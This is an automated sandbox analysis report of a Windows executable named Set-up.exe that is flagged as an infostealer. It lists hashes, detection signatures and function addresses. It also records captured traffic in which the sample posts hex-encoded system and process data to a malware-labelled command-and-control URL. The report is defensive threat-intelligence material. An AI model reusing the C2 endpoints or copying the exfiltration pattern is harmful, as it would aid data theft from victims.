Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1582042
MD5:fb412d366acb254b7870e17ea228e971
SHA1:6217577b0421b22d98717a23b46b884481d298e7
SHA256:db605eba071eeeb78c1aa93a018046699cca2a5260e9601f599cd96c55cccd9d
Tags:exeuser-aachum
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contain functionality to detect virtual machines
Infostealer behavior detected
Leaks process information
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Set-up.exe (PID: 6880 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: FB412D366ACB254B7870E17EA228E971)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836Avira URL Cloud: Label: malware
Source: http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836http://home.eleventh11pt.top/nJdxBxrKAaFnAvira URL Cloud: Label: malware
Source: http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg17354658365a1Avira URL Cloud: Label: malware
Source: http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836?argument=0Avira URL Cloud: Label: malware
Source: Set-up.exeReversingLabs: Detection: 28%
Source: Set-up.exeVirustotal: Detection: 32%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.1% probability
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003A8E90 Sleep,_open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,0_2_003A8E90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004F38F0 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,0_2_004F38F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00036080 memset,BCryptGenRandom,0_2_00036080
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000A8EA0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,0_2_000A8EA0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0025F6E0 wcscmp,CryptAcquireContextW,CryptGetUserKey,GetLastError,GetLastError,CryptReleaseContext,0_2_0025F6E0
Source: Set-up.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0002255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0002255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000229FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_000229FF
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001FE270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,0_2_001FE270
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0002255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0002255D
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /nJdxBxrKAaFnbbAEfLtg1735465836 HTTP/1.1Host: home.eleventh11pt.topAccept: */*Content-Type: application/jsonContent-Length: 499220Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 33 31 36 30 36 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2
Source: global trafficHTTP traffic detected: GET /nJdxBxrKAaFnbbAEfLtg1735465836?argument=0 HTTP/1.1Host: home.eleventh11pt.topAccept: */*
Source: global trafficHTTP traffic detected: POST /nJdxBxrKAaFnbbAEfLtg1735465836 HTTP/1.1Host: home.eleventh11pt.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewASN Name: FREE-MPEIRU FREE-MPEIRU
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000EA8C0 recvfrom,0_2_000EA8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /nJdxBxrKAaFnbbAEfLtg1735465836?argument=0 HTTP/1.1Host: home.eleventh11pt.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.eleventh11pt.top
Source: unknownHTTP traffic detected: POST /nJdxBxrKAaFnbbAEfLtg1735465836 HTTP/1.1Host: home.eleventh11pt.topAccept: */*Content-Type: application/jsonContent-Length: 499220Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 33 31 36 30 36 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sun, 29 Dec 2024 15:51:11 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sun, 29 Dec 2024 15:51:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: Set-up.exeString found in binary or memory: http://.css
Source: Set-up.exeString found in binary or memory: http://.jpg
Source: Set-up.exeString found in binary or memory: http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836
Source: Set-up.exe, 00000000.00000003.1811748473.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1813418338.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1811594383.0000000000CD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg17354658365a1
Source: Set-up.exe, 00000000.00000003.1811594383.0000000000CD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836?argument=0
Source: Set-up.exe, 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.eleventh11pt.top/nJdxBxrKAaFnbbAEfLtg1735465836http://home.eleventh11pt.top/nJdxBxrKAaFn
Source: Set-up.exeString found in binary or memory: http://html4/loose.dtd
Source: Set-up.exeString found in binary or memory: http://timestamp.digicert.com0
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/hsts.html
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Set-up.exeString found in binary or memory: https://httpbin.org/ip
Source: Set-up.exe, 00000000.00000003.1692006117.0000000000C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip9
Source: Set-up.exeString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CE4F220_3_00CE4F22
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00CE4E310_3_00CE4E31
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000305B00_2_000305B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00036FA00_2_00036FA0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000EB1800_2_000EB180
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003700320_2_00370032
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003AA0000_2_003AA000
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0032C0500_2_0032C050
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003AE0500_2_003AE050
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000CE0700_2_000CE070
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002100800_2_00210080
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001900F00_2_001900F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000F00E00_2_000F00E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0028E1380_2_0028E138
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002B01700_2_002B0170
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001941700_2_00194170
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0033C1A00_2_0033C1A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000862100_2_00086210
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001B02000_2_001B0200
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0037E2F00_2_0037E2F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002E42F00_2_002E42F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000962E00_2_000962E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003962D00_2_003962D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000EC3200_2_000EC320
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002103500_2_00210350
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002DA3A00_2_002DA3A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000EE3E00_2_000EE3E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003744100_2_00374410
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001824300_2_00182430
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000F04200_2_000F0420
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0038C4700_2_0038C470
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003904600_2_00390460
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002DE4500_2_002DE450
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001424A00_2_001424A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0006E5200_2_0006E520
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003905600_2_00390560
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003885A00_2_003885A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003A05900_2_003A0590
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0028E5D00_2_0028E5D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0002E6200_2_0002E620
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0039A6100_2_0039A610
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003666B00_2_003666B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0007E6A00_2_0007E6A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002E26E00_2_002E26E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003867300_2_00386730
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001A87300_2_001A8730
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000EC7700_2_000EC770
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0020A7800_2_0020A780
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003A47800_2_003A4780
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002687D00_2_002687D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0039A8000_2_0039A800
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003748A00_2_003748A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000DC9000_2_000DC900
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000349400_2_00034940
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0002A9600_2_0002A960
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0039E9400_2_0039E940
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003A09400_2_003A0940
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001949F00_2_001949F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00114A000_2_00114A00
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0038EA700_2_0038EA70
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000A6AA00_2_000A6AA0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001F6AC00_2_001F6AC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00218AC00_2_00218AC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002DAAC00_2_002DAAC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002DAB2C0_2_002DAB2C
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00368B300_2_00368B30
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0037CB000_2_0037CB00
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00250B600_2_00250B60
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002E0B700_2_002E0B70
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001B4B600_2_001B4B60
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00386BB00_2_00386BB0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0002CBB00_2_0002CBB0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00398BF00_2_00398BF0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0020ABC00_2_0020ABC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00368C700_2_00368C70
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003ACC900_2_003ACC90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00366C800_2_00366C80
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00394D500_2_00394D50
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_003A4D400_2_003A4D40
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0039CD800_2_0039CD80
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00368DF00_2_00368DF0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000D2DC00_2_000D2DC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0031CE300_2_0031CE30
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0033AE300_2_0033AE30
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00186E900_2_00186E90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00148F200_2_00148F20
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00044F700_2_00044F70
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000EEF900_2_000EEF90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000E8F900_2_000E8F90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00372F900_2_00372F90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00346F800_2_00346F80
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001AAFC00_2_001AAFC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0020AFC00_2_0020AFC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002230200_2_00223020
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0037F0100_2_0037F010
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001FF0400_2_001FF040
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_000310E60_2_000310E6
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_002111000_2_00211100
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_001411400_2_00141140
